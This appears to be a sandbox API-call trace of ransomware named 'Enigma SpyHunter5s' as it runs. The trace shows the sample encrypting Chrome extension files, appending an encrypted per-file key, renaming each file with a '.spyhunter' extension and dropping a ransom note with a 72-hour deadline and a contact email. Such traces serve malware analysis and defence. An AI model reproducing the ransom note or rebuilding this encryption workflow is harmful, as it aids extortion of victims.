(HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.019] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.spyhunter") returned 162 [0158.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json.spyhunter")) returned 1 [0158.020] GetProcessHeap () returned 0x2c0000 [0158.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.020] GetProcessHeap () returned 0x2c0000 [0158.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0158.020] GetProcessHeap () returned 0x2c0000 [0158.020] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f21cc8 | out: hHeap=0x2c0000) returned 1 [0158.020] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cebf8 | out: pbBuffer=0x25cebf8) returned 1 [0158.020] GetProcessHeap () returned 0x2c0000 [0158.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0158.020] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cebf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cebf0*=0x30) returned 1 [0158.020] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0158.047] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html") returned 152 [0158.047] StrStrW (lpFirst="feedback.html", lpSrch=".txt") returned 0x0 [0158.048] GetProcessHeap () returned 0x2c0000 [0158.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0158.048] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cebb4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cebb4*=0x2800, lpOverlapped=0x0) returned 1 [0158.819] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.819] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cebb4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cebb4*=0x2800, lpOverlapped=0x0) returned 1 [0158.819] GetProcessHeap () returned 0x2c0000 [0158.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0158.819] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.819] WriteFile (in: hFile=0xb0, lpBuffer=0x25cebf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cebb4, lpOverlapped=0x0 | out: lpBuffer=0x25cebf4*, lpNumberOfBytesWritten=0x25cebb4*=0x4, lpOverlapped=0x0) returned 1 [0158.878] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cebb4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cebb4*=0x30, lpOverlapped=0x0) returned 1 [0158.878] CloseHandle (hObject=0xb0) returned 1 [0158.878] GetProcessHeap () returned 0x2c0000 [0158.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.878] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.spyhunter") returned 162 [0158.878] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\feedback.html.spyhunter")) returned 1 [0158.879] GetProcessHeap () returned 0x2c0000 [0158.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.879] GetProcessHeap () returned 0x2c0000 [0158.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0158.879] GetProcessHeap () returned 0x2c0000 [0158.879] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f8b8 | out: hHeap=0x2c0000) returned 1 [0158.880] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cebf8 | out: pbBuffer=0x25cebf8) returned 1 [0158.880] GetProcessHeap () returned 0x2c0000 [0158.880] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0158.880] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cebf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cebf0*=0x30) returned 1 [0158.880] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0158.880] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js") returned 170 [0158.880] StrStrW (lpFirst="cast_app_redirect.js", lpSrch=".txt") returned 0x0 [0158.881] GetProcessHeap () returned 0x2c0000 [0158.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0158.881] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cebb4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cebb4*=0xf2, lpOverlapped=0x0) returned 1 [0158.881] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.881] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x25cebb4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cebb4*=0xf2, lpOverlapped=0x0) returned 1 [0158.882] GetProcessHeap () returned 0x2c0000 [0158.882] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0158.882] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.882] WriteFile (in: hFile=0xb0, lpBuffer=0x25cebf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cebb4, lpOverlapped=0x0 | out: lpBuffer=0x25cebf4*, lpNumberOfBytesWritten=0x25cebb4*=0x4, lpOverlapped=0x0) returned 1 [0158.882] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cebb4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cebb4*=0x30, lpOverlapped=0x0) returned 1 [0158.882] CloseHandle (hObject=0xb0) returned 1 [0158.882] GetProcessHeap () returned 0x2c0000 [0158.882] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.882] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.spyhunter") returned 180 [0158.882] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app_redirect.js.spyhunter")) returned 1 [0158.883] GetProcessHeap () returned 0x2c0000 [0158.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.884] GetProcessHeap () returned 0x2c0000 [0158.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0158.884] GetProcessHeap () returned 0x2c0000 [0158.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc71a0 | out: hHeap=0x2c0000) returned 1 [0158.884] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cebf0 | out: pbBuffer=0x25cebf0) returned 1 [0158.884] GetProcessHeap () returned 0x2c0000 [0158.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0158.884] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cebe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cebe8*=0x30) returned 1 [0158.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0158.885] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js") returned 161 [0158.885] StrStrW (lpFirst="cast_app.js", lpSrch=".txt") returned 0x0 [0158.885] GetProcessHeap () returned 0x2c0000 [0158.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0158.885] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cebac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cebac*=0x2800, lpOverlapped=0x0) returned 1 [0158.891] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.891] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cebac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cebac*=0x2800, lpOverlapped=0x0) returned 1 [0158.891] GetProcessHeap () returned 0x2c0000 [0158.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0158.891] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.891] WriteFile (in: hFile=0xb0, lpBuffer=0x25cebec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cebac, lpOverlapped=0x0 | out: lpBuffer=0x25cebec*, lpNumberOfBytesWritten=0x25cebac*=0x4, lpOverlapped=0x0) returned 1 [0158.943] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cebac, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cebac*=0x30, lpOverlapped=0x0) returned 1 [0158.943] CloseHandle (hObject=0xb0) returned 1 [0159.005] GetProcessHeap () returned 0x2c0000 [0159.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.005] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.spyhunter") returned 171 [0159.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\cast_app.js.spyhunter")) returned 1 [0159.006] GetProcessHeap () returned 0x2c0000 [0159.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.006] GetProcessHeap () returned 0x2c0000 [0159.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.006] GetProcessHeap () returned 0x2c0000 [0159.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f20988 | out: hHeap=0x2c0000) returned 1 [0159.007] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cebf0 | out: pbBuffer=0x25cebf0) returned 1 [0159.007] GetProcessHeap () returned 0x2c0000 [0159.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.007] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cebe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cebe8*=0x30) returned 1 [0159.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.007] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js") returned 159 [0159.008] StrStrW (lpFirst="background_script.js", lpSrch=".txt") returned 0x0 [0159.008] GetProcessHeap () returned 0x2c0000 [0159.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0159.008] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cebac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cebac*=0x2800, lpOverlapped=0x0) returned 1 [0159.024] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.024] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cebac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cebac*=0x2800, lpOverlapped=0x0) returned 1 [0159.025] GetProcessHeap () returned 0x2c0000 [0159.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0159.025] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.025] WriteFile (in: hFile=0xb0, lpBuffer=0x25cebec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cebac, lpOverlapped=0x0 | out: lpBuffer=0x25cebec*, lpNumberOfBytesWritten=0x25cebac*=0x4, lpOverlapped=0x0) returned 1 [0159.026] WriteFile (in: hFile=0xb0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cebac, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cebac*=0x30, lpOverlapped=0x0) returned 1 [0159.026] CloseHandle (hObject=0xb0) returned 1 [0159.110] GetProcessHeap () returned 0x2c0000 [0159.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.110] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.spyhunter") returned 169 [0159.110] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.spyhunter")) returned 1 [0159.111] GetProcessHeap () returned 0x2c0000 [0159.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.111] GetProcessHeap () returned 0x2c0000 [0159.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.111] GetProcessHeap () returned 0x2c0000 [0159.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1f6d0 | out: hHeap=0x2c0000) returned 1 [0159.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.112] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.112] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb1f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cec48, lpOverlapped=0x0 | out: lpBuffer=0x25ceb1f*, lpNumberOfBytesWritten=0x25cec48*=0x127, lpOverlapped=0x0) returned 1 [0159.113] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.113] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cec48, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cec48*=0x2ac, lpOverlapped=0x0) returned 1 [0159.113] CloseHandle (hObject=0x178) returned 1 [0159.113] GetProcessHeap () returned 0x2c0000 [0159.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1d0b0 | out: hHeap=0x2c0000) returned 1 [0159.113] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cebe8 | out: pbBuffer=0x25cebe8) returned 1 [0159.113] GetProcessHeap () returned 0x2c0000 [0159.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.114] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cebe0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cebe0*=0x30) returned 1 [0159.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.115] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json") returned 155 [0159.115] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.115] GetProcessHeap () returned 0x2c0000 [0159.115] 